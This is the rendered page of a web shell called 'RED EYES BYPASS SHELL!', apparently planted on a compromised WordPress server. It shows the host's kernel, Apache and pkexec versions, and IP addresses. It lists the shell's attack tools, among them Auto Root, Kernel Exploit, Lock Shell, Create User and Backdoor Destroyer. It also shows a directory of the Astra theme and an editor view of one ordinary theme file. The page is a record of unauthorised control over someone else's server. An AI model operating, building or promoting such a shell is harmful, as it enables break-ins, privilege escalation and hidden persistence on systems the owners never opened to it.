Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-content /
themes /
astra /
inc /
core /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
builder
[ DIR ]
drwxr-xr-x
deprecated
[ DIR ]
drwxr-xr-x
markup
[ DIR ]
drwxr-xr-x
class-astra-admin-helper.php
2.07
KB
-rwxr-xr-x
class-astra-admin-settings.php
26.15
KB
-rwxr-xr-x
class-astra-attr.php
2.64
KB
-rwxr-xr-x
class-astra-enqueue-scripts.php
26.41
KB
-rwxr-xr-x
class-astra-icons.php
13.88
KB
-rwxr-xr-x
class-astra-theme-options.php
34.5
KB
-rwxr-xr-x
class-astra-walker-page.php
4.55
KB
-rwxr-xr-x
class-astra-wp-editor-css.php
64.84
KB
-rwxr-xr-x
class-gutenberg-editor-css.php
79.39
KB
-rwxr-xr-x
class-theme-strings.php
5.08
KB
-rwxr-xr-x
common-functions.php
67.62
KB
-rwxr-xr-x
index.php
111
B
-rwxr-xr-x
sidebar-manager.php
2.2
KB
-rwxr-xr-x
theme-hooks.php
8.94
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-astra-admin-helper.php
<?php /** * Admin settings helper * * @link https://developer.wordpress.org/themes/basics/theme-functions/ * * @package Astra * @link https://wpastra.com/ * @since Astra 1.0 */ if ( ! defined( 'ABSPATH' ) ) { exit; // Exit if accessed directly. } if ( ! class_exists( 'Astra_Admin_Helper' ) ) { /** * Admin Helper */ final class Astra_Admin_Helper { /** * Returns an option from the database for * the admin settings page. * * @param string $key The option key. * @param bool $network Whether to allow the network admin setting to be overridden on subsites. * @return string Return the option value */ public static function get_admin_settings_option( $key, $network = false ) { // Get the site-wide option if we're in the network admin. if ( $network && is_multisite() ) { $value = get_site_option( $key ); } else { $value = get_option( $key ); } return $value; } /** * Updates an option from the admin settings page. * * @param string $key The option key. * @param mixed $value The value to update. * @param bool $network Whether to allow the network admin setting to be overridden on subsites. * @return mixed */ public static function update_admin_settings_option( $key, $value, $network = false ) { // Update the site-wide option since we're in the network admin. if ( $network && is_multisite() ) { update_site_option( $key, $value ); } else { update_option( $key, $value ); } } /** * Returns an option from the database for * the admin settings page. * * @param string $key The option key. * @param bool $network Whether to allow the network admin setting to be overridden on subsites. * @return mixed */ public static function delete_admin_settings_option( $key, $network = false ) { // Get the site-wide option if we're in the network admin. if ( $network && is_multisite() ) { $value = delete_site_option( $key ); } else { $value = delete_option( $key ); } return $value; } } }
Close